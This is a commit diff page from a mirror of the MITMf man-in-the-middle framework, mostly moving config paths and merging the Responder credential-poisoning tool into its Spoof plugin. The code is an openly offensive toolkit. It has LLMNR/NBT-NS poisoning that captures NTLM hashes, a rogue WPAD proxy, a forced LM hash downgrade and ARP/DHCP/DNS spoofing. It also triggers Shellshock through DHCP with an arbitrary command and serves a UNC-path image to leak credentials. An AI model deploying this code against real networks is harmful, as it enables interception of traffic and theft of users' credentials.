github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

almost done! lots of changes

Browse source
This commit is contained in:
byt3bl33d3r 2014-12-05 08:21:35 +01:00
parent e8c36dbc89
commit 787f96d665
12 changed files with 202 additions and 201 deletions
Download patch file Download diff file Expand all files Collapse all files

4
libs/responder/Responder.conf → config/responder.conf
View file

@ -55,8 +55,8 @@ HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\sey
[HTTPS Server]
;
;Change to use your certs
cert = Certs/responder.crt
key = Certs/responder.key
cert = config/certs/responder.crt
key = config/certs/responder.key
;

2
libs/AppCachePoisonClass.py
View file

@ -1,6 +1,6 @@
import logging, re, os.path, time
from datetime import date
from sslstrip.DummyResponseTamperer import DummyResponseTamperer
from libs.sslstrip.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):

299
libs/responder/Responder.py
View file

@ -16,106 +16,38 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
import sys
import struct
import SocketServer
import re
import socket
import thread
import libs.responder.Fingerprint
import random
import os
import ConfigParser
import BaseHTTPServer
import select
import urlparse
import zlib
import string
import logging
import time
from OpenSSL import SSL
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict
from libs.responder.Fingerprint import RunSmbFinger, OsNameClientVersion
from libs.responder.odict import OrderedDict
from libs.responder.RAPLANMANPackets import *
from libs.responder.SMBPackets import *
from libs.responder.SQLPackets import *
from libs.responder.HTTPPackets import *
from libs.responder.HTTPProxy import *
from libs.responder.LDAPPackets import *
from libs.responder.SMTPPackets import *
from libs.responder.IMAPPackets import *
from socket import inet_aton
from random import randrange
VERSION = 'Responder 2.1.2'
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf', version = VERSION,
prog=sys.argv[0],
)
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", dest="Analyse")
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set")
parser.add_option('-b', '--basic',action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned.", dest="Basic", default=False)
parser.add_option('-r', '--wredir',action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False", dest="Wredirect", default=False)
parser.add_option('-d', '--NBTNSdomain',action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False",dest="NBTNSDomain", default=False)
parser.add_option('-f','--fingerprint', action="store_true", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", default=False)
parser.add_option('-w','--wpad', action="store_true", dest="WPAD_On_Off", help = "Set this to start the WPAD rogue proxy server. Default value is False", default=False)
parser.add_option('-F','--ForceWpadAuth', action="store_true", dest="Force_WPAD_Auth", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False",default=False)
parser.add_option('--lm',action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False", dest="LM_On_Off", default=False)
parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
options, args = parser.parse_args()
if options.OURIP is None:
print "\n\033[1m\033[31m-i mandatory option is missing\033[0m\n"
parser.print_help()
exit(-1)
ResponderPATH = os.path.dirname(__file__)
#Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(ResponderPATH,'Responder.conf'))
# Set some vars.
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
#Cli options.
OURIP = options.OURIP
LM_On_Off = options.LM_On_Off
WPAD_On_Off = options.WPAD_On_Off
Wredirect = options.Wredirect
NBTNSDomain = options.NBTNSDomain
Basic = options.Basic
Finger_On_Off = options.Finger
INTERFACE = options.INTERFACE
Verbose = options.Verbose
Force_WPAD_Auth = options.Force_WPAD_Auth
AnalyzeMode = options.Analyse
if HTMLToServe == None:
HTMLToServe = ''
if INTERFACE != "Not set":
BIND_TO_Interface = INTERFACE
if INTERFACE == "Not set":
BIND_TO_Interface = "ALL"
if len(NumChal) is not 16:
print "The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n"
parser.print_help()
exit(-1)
def IsOsX():
Os_version = sys.platform
if Os_version == "darwin":
@ -138,26 +70,6 @@ def Analyze(AnalyzeMode):
else:
return False
#Logger
CommandLine = str(sys.argv)
import logging
logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
StartMessage = 'Responder Started\nCommand line args:%s' %(CommandLine)
logging.warning(StartMessage)
Log2Filename = str(os.path.join(ResponderPATH,"LLMNR-NBT-NS.log"))
logger2 = logging.getLogger('LLMNR/NBT-NS')
logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
def Show_Help(ExtraHelpData):
help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
help+= ExtraHelpData
print help
#Function used to write captured hashs to a file.
def WriteData(outfile,data, user):
if os.path.isfile(outfile) == False:
@ -208,17 +120,6 @@ def PrintLLMNRNBTNS(outfile,Message):
else:
return True
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
Show_Help("[+]NBT-NS, LLMNR & MDNS responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface: %s\nChallenge set: %s\nWPAD Proxy Server: %s\nWPAD script loaded: %s\nHTTP Server: %s\nHTTPS Server: %s\nSMB Server: %s\nSMB LM support: %s\nKerberos Server: %s\nSQL Server: %s\nFTP Server: %s\nIMAP Server: %s\nPOP3 Server: %s\nSMTP Server: %s\nDNS Server: %s\nLDAP Server: %s\nFingerPrint hosts: %s\nServing Executable via HTTP&WPAD: %s\nAlways Serving a Specific File via HTTP&WPAD: %s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,Krb_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
if AnalyzeMode:
print '[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.\n'
#Packet class handling all packet generation (see odict.py).
class Packet():
fields = OrderedDict([
@ -494,7 +395,6 @@ class NB(BaseRequestHandler):
##################################################################################
#Browser Listener and Lanman Finger
##################################################################################
from RAPLANMANPackets import *
def WorkstationFingerPrint(data):
Role = {
@ -666,8 +566,6 @@ class Browser(BaseRequestHandler):
##################################################################################
#SMB Server
##################################################################################
from SMBPackets import *
#Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
@ -1101,8 +999,6 @@ class KerbUDP(BaseRequestHandler):
##################################################################################
#SQL Stuff
##################################################################################
from SQLPackets import *
#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
def ParseSQLHash(data,client):
SSPIStart = data[8:]
@ -1294,8 +1190,6 @@ def AnalyzeICMPRedirect():
if Analyze(AnalyzeMode) and INTERFACE != 'Not set':
IsICMPRedirectPlausible(FindLocalIP(INTERFACE))
AnalyzeICMPRedirect()
# LLMNR Server class.
class LLMNR(BaseRequestHandler):
@ -1567,9 +1461,6 @@ class MDNS(BaseRequestHandler):
##################################################################################
#HTTP Stuff
##################################################################################
from HTTPPackets import *
from HTTPProxy import *
#Parse NTLMv1/v2 hash.
def ParseHTTPHash(data,client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -1994,7 +1885,6 @@ class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
##################################################################################
#HTTPS Server
##################################################################################
from OpenSSL import SSL
#Parse NTLMv1/v2 hash.
def ParseHTTPSHash(data,client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -2082,8 +1972,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(ResponderPATH,config.get('HTTPS Server', 'cert'))
key = os.path.join(ResponderPATH,config.get('HTTPS Server', 'key'))
cert = config.get('HTTPS Server', 'cert'))
key = config.get('HTTPS Server', 'key'))
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -2160,8 +2050,6 @@ class FTP(BaseRequestHandler):
##################################################################################
#LDAP Stuff
##################################################################################
from LDAPPackets import *
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
@ -2291,8 +2179,6 @@ class POP(BaseRequestHandler):
##################################################################################
#ESMTP Stuff
##################################################################################
from SMTPPackets import *
#ESMTP server class.
class ESMTP(BaseRequestHandler):
@ -2323,8 +2209,6 @@ class ESMTP(BaseRequestHandler):
##################################################################################
#IMAP4 Stuff
##################################################################################
from IMAPPackets import *
#ESMTP server class.
class IMAP(BaseRequestHandler):
@ -2374,7 +2258,7 @@ def Is_WPAD_On(on_off):
return False
#Function name self-explanatory
def Is_SMB_On(SMB_On_Off):
def Is_SMB_On(SMB_On_Off, LM_On_Off):
if SMB_On_Off == "ON":
if LM_On_Off == True:
return thread.start_new(serve_thread_tcp, ('', 445,SMB1LM)),thread.start_new(serve_thread_tcp,('', 139,SMB1LM))
@ -2540,18 +2424,125 @@ def serve_thread_SSL(host, port, handler):
else:
server = SSlSock((host, port), handler)
server.serve_forever()
except:
print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
except Exception, e:
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
print "Check that you have the necessary permissions (i.e. root), no other servers/services are running and the correct network interface was chosen"
def start_responder(options, ipaddr):
VERSION = '2.1.2'
global OURIP; OURIP = ipaddr
global LM_On_Off; LM_On_Off = options.LM_On_Off
global WPAD_On_Off; WPAD_On_Off = options.WPAD_On_Off
global Wredirect; Wredirect= options.Wredirect
global NBTNSDomain; NBTNSDomain = options.NBTNSDomain
global Basic; Basic = options.Basic
global Finger_On_Off; Finger_On_Off = options.Finger
global INTERFACE; INTERFACE = options.interface
global BIND_TO_Interface; BIND_TO_Interface = options.interface
global Verbose; Verbose = options.Verbose
global Force_WPAD_Auth; Force_WPAD_Auth = options.Force_WPAD_Auth
global AnalyzeMode; AnalyzeMode = options.Analyse
#Read the responder.conf file
global config; config = ConfigParser.ConfigParser()
config.read('./config/responder.conf')
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
if HTMLToServe == None:
HTMLToServe = ''
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
#Logger
#CommandLine = str(sys.argv)
#logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
#StartMessage = 'Responder Started\nCommand line args:%s' %(CommandLine)
#logging.warning(StartMessage)
#Log2Filename = str("./logs/LLMNR-NBT-NS.log"))
#logger2 = logging.getLogger('LLMNR/NBT-NS')
#logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
#AnalyzeFilename = str("./logs/Analyze-LLMNR-NBT-NS.log"))
#logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
#logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
AnalyzeICMPRedirect()
def main():
try:
banner = "[*] NBT-NS, LLMNR & MDNS Responder v%s by Laurent Gaffie online\n" % VERSION
start_message = "Global Parameters set:\n"
start_message += "Responder is bound to interface: %s\n" % INTERFACE
start_message += "Challenge set: %s\n" % NumChal
start_message += "WPAD Proxy Server: %s\n" % WPAD_On_Off
start_message += "WPAD script loaded: %s\n" % WPAD_Script
start_message += "HTTP Server: %s\n" % On_Off
start_message += "HTTPS Server: %s\n" % SSL_On_Off
start_message += "SMB Server: %s\n" % SMB_On_Off
start_message += "SMB LM support: %s\n" % LM_On_Off
start_message += "Kerberos Server: %s\n" % Krb_On_Off
start_message += "SQL Server: %s\n" % SQL_On_Off
start_message += "FTP Server: %s\n" % FTP_On_Off
start_message += "IMAP Server: %s\n" % IMAP_On_Off
start_message += "POP3 Server: %s\n" % POP_On_Off
start_message += "SMTP Server: %s\n" % SMTP_On_Off
start_message += "DNS Server: %s\n" % DNS_On_Off
start_message += "LDAP Server: %s\n" % LDAP_On_Off
start_message += "FingerPrint hosts: %s\n" % Finger_On_Off
start_message += "Serving Executable via HTTP&WPAD: %s\n" % Exe_On_Off
start_message += "Always Serving a Specific File via HTTP&WPAD: %s\n" % Exec_Mode_On_Off
print banner
#print start_message
if AnalyzeMode:
print '[*] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned'
num_thrd = 1
Is_FTP_On(FTP_On_Off)
Is_HTTP_On(On_Off)
Is_HTTPS_On(SSL_On_Off)
Is_WPAD_On(WPAD_On_Off)
Is_Kerberos_On(Krb_On_Off)
Is_SMB_On(SMB_On_Off)
Is_SMB_On(SMB_On_Off, LM_On_Off)
Is_SQL_On(SQL_On_Off)
Is_LDAP_On(LDAP_On_Off)
Is_DNS_On(DNS_On_Off)
@ -2569,9 +2560,3 @@ def main():
time.sleep(1)
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
try:
main()
except:
raise

0
libs/responder/__init__.py Normal file
View file

2
libs/sslstrip/URLMonitorHSTS.py
View file

@ -27,7 +27,7 @@ class URLMonitor:
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config_files/hsts_bypass.cfg")
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v

4
mitmf.py
View file

@ -13,7 +13,7 @@ import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
mitmf_version = "0.8"
mitmf_version = "0.9"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
@ -94,7 +94,7 @@ if __name__ == "__main__":
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
print "[*] sergio-proxy v%s online..." % sergio_version
else:
from libs.sslstrip.StrippingProxy import StrippingProxy

3
plugins/AirPwn.py
View file

@ -32,7 +32,7 @@ class AirPwn(Plugin):
sys.exit("[-] AirPwn plugin requires --miface argument")
try:
self.aircfg = ConfigObj(self.aircfg)
self.aircfg = ConfigObj("./config/airpwn.cfg")
#Here we compile the regexes for faster performance when injecting packets
for rule in self.aircfg.items():
rule[1]['match'] = re.compile(r'%s' % rule[1]['match'])
@ -135,5 +135,4 @@ class AirPwn(Plugin):
def add_options(self, options):
options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')

11
plugins/AppCachePoison.py
View file

@ -1,21 +1,18 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
from libs.sslstrip.ResponseTampererFactory import ResponseTampererFactory
#import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg or "./config_files/app_cache_poison.cfg"
self.config_file = "./config/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")

8
plugins/BeefAutorun.py
View file

@ -38,7 +38,7 @@ class BeefAutorun(Inject, Plugin):
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
userconfig = ConfigObj("./config/beefautorun.cfg")
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
@ -117,10 +117,10 @@ class BeefAutorun(Inject, Plugin):
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--hookip', dest='hookip', help="Hook IP")
group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')

2
plugins/FilePwn.py
View file

@ -38,7 +38,7 @@ class FilePwn(Plugin):
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg or "./config_files/filepwn.cfg"
self.filepwncfg = options.filepwncfg or "./config/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']

3
plugins/JavaPwn.py
View file

@ -35,7 +35,7 @@ class JavaPwn(BrowserProfiler, Plugin):
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
self.javacfg = ConfigObj(self.javapwncfg)
self.javacfg = ConfigObj("./config/javapwn.cfg")
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
@ -182,7 +182,6 @@ class JavaPwn(BrowserProfiler, Plugin):
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')
def finish(self):
'''This will be called when shutting down'''

59
plugins/Spoof.py
View file

@ -13,6 +13,7 @@ import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
from libs.responder.Responder import *
import os
import sys
import threading
@ -39,11 +40,8 @@ class Spoof(Plugin):
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.wpad = options.wpad
self.dns = options.dns
self.dnscfg = options.dnscfg
self.dhcp = options.dhcp
self.dhcpcfg = options.dhcpcfg
self.shellshock = options.shellshock
self.cmd = options.cmd
self.gateway = options.gateway
@ -52,10 +50,11 @@ class Spoof(Plugin):
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
thread_target = None
thread_args = None
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
@ -63,13 +62,17 @@ class Spoof(Plugin):
if not self.interface:
sys.exit('[-] Spoof plugin requires --iface argument')
try:
self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % self.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
try:
self.mac = get_if_hwaddr(self.interface)
except Exception, e:
@ -107,19 +110,24 @@ class Spoof(Plugin):
self.rand_number = []
self.dhcp_dic = {}
self.dhcpcfg = ConfigObj(self.dhcpcfg)
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
thread_target = self.dhcp_sniff
thread_args = ()
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
elif not options.WPAD_On_Off:
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --wpad")
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.dnscfg = ConfigObj("./config/dns.cfg")
self.hstscfg = ConfigObj(self.hstscfg)
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
@ -133,11 +141,16 @@ class Spoof(Plugin):
print '[*] Setting up iptables'
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
CHarvester = CredHarvester()
t1 = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
#CHarvester = CredHarvester()
threads = []
if thread_target:
threads.append(threading.Thread(name='spoof_thread', target=thread_target, args=thread_args))
#t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
for t in [t1, t2]:
threads.append(threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)))
if threads:
for t in threads:
t.setDaemon(True)
t.start()
@ -345,14 +358,22 @@ class Spoof(Plugin):
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#rgroup = options.add_argument_group("Responder", "Options for Responder")
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
options.add_argument('--verbose', dest="Verbose", action="store_true", help="More verbose")
def finish(self):
self.send = False